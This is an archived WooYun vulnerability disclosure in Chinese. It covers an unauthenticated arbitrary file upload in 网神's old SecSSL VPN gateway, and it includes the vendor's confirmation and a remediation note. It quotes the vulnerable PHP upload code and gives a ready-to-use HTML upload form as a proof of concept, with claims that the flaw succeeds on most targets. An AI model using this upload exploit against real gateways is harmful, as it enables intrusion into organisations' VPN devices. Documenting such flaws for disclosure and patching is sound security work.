网神某网关设备2个任意代码执行漏洞（无需登录）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170017

漏洞标题：网神某网关设备2个任意代码执行漏洞（无需登录）

漏洞作者：路人甲

提交时间：2016-01-15 10:19

修复时间：2016-04-11 16:08

公开时间：2016-04-11 16:08

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-15：细节已通知厂商并且等待厂商处理中
2016-01-19：厂商已经确认，细节仅向厂商公开
2016-01-22：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2016-03-14：细节向核心白帽子及相关领域专家公开
2016-03-24：细节向普通白帽子公开
2016-04-03：细节向实习白帽子公开
2016-04-11：细节向公众公开

简要描述：

网神旧版SecSSL VPN产品

详细说明：

存在漏洞的文件

/admin/account/user_add_action.php
/admin/account/user_edit_action.php
/admin/account/huge_user_edit_step1_action.php
/admin/account/admin_add_action.php
重复一处

这三个文件的部分漏洞代码为：
0x1 /admin/account/user_add_action.php(/admin/account/admin_add_action.php类似)

if (($authServerUserFlag == 4) || ($authServerUserFlag == 5) || ($auth_type == 4)) {
	if ($_FILES['certificate_file']['error'] == UPLOAD_ERR_OK) {
		if(isset($_POST["zip_cb"]))
			$userId = 1;
		$file_size = $_FILES['certificate_file']['size'];
		$file_type = $_FILES['certificate_file']['type'];
		
		$temp_name = $_FILES['certificate_file']['tmp_name'];
		$gw_file_name = $_FILES['certificate_file']['name'];
		$gw_file_name = str_replace("\\","",$gw_file_name);
		$gw_file_name = str_replace("'","",$gw_file_name);
		$gw_file_name = str_replace(" ","",$gw_file_name);
		$file_path = $CFG_UPLOAD_PATH.$gw_file_name;
		//File Name Check
		if ( $gw_file_name == "" ) { 
			include "include/error.php";
			return;
		}

0x2 /admin/account/huge_user_edit_step1_action.php

if (($auth_type == 4) || ($auth_type == 5)) {
	if ($_FILES['certificate_file']) {
		$file_size = $_FILES['certificate_file']['size'];
		$file_type = $_FILES['certificate_file']['type'];
		
		$temp_name = $_FILES['certificate_file']['tmp_name'];
		$gw_file_name = $_FILES['certificate_file']['name'];
		$gw_file_name = str_replace("\\","",$gw_file_name);
		$gw_file_name = str_replace("'","",$gw_file_name);
		$gw_file_name = str_replace(" ","",$gw_file_name);
		$file_path = $CFG_UPLOAD_PATH.$gw_file_name;
		$gw_file_name = $file_path;
		$result=  move_uploaded_file($temp_name, $file_path);
		chmod($file_path, $CFG_UPLOAD_MOD);
	}
}

根据上面的代码可以看出，对于文件的上传没有任何的限制，因此可直接上传任意文件

漏洞证明：

同样，保存如下代码为wooyun.htm

<form action="**.**.**.**/admin/account/user_add_action.php?CFG_UPLOAD_PATH=/ssl/www/admin/js/" method="post" enctype ="multipart/form-data"> 
	<input name="certificate_file" type="file" />
	<input name="auth_type" type="hidden" value="4"/>
	<input type="submit" name="submit_post" value="pki_localca_import_addsave"/>
</form>

用浏览器打开该文件，修改host,直接上传即可：
漏洞大量存在，几乎是百发百中，给几个案例：

**.**.**.**/welcome_pop.php
https://**.**.**.**/welcome_pop.php

修复方案：

严格限制文件上传

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-01-19 22:39

厂商回复：

感谢白帽子的反馈，经过核实，网神早年旧版VPN的确存在PHP漏洞缺陷问题，网神新一代SSLVPN产品不受影响。由于现存的旧版VPN客户数量不多，网神内部会针对现存的旧版VPN客户逐一进行联系，提供系统升级或设备更换服务。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170017

漏洞标题：网神某网关设备2个任意代码执行漏洞（无需登录）

相关厂商：网神信息技术(北京)股份有限公司

漏洞作者：路人甲

提交时间：2016-01-15 10:19

修复时间：2016-04-11 16:08

公开时间：2016-04-11 16:08

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170017

漏洞标题：网神某网关设备2个任意代码执行漏洞（无需登录）

相关厂商：网神信息技术(北京)股份有限公司

漏洞作者： 路人甲

提交时间：2016-01-15 10:19

修复时间：2016-04-11 16:08

公开时间：2016-04-11 16:08

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0170017"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云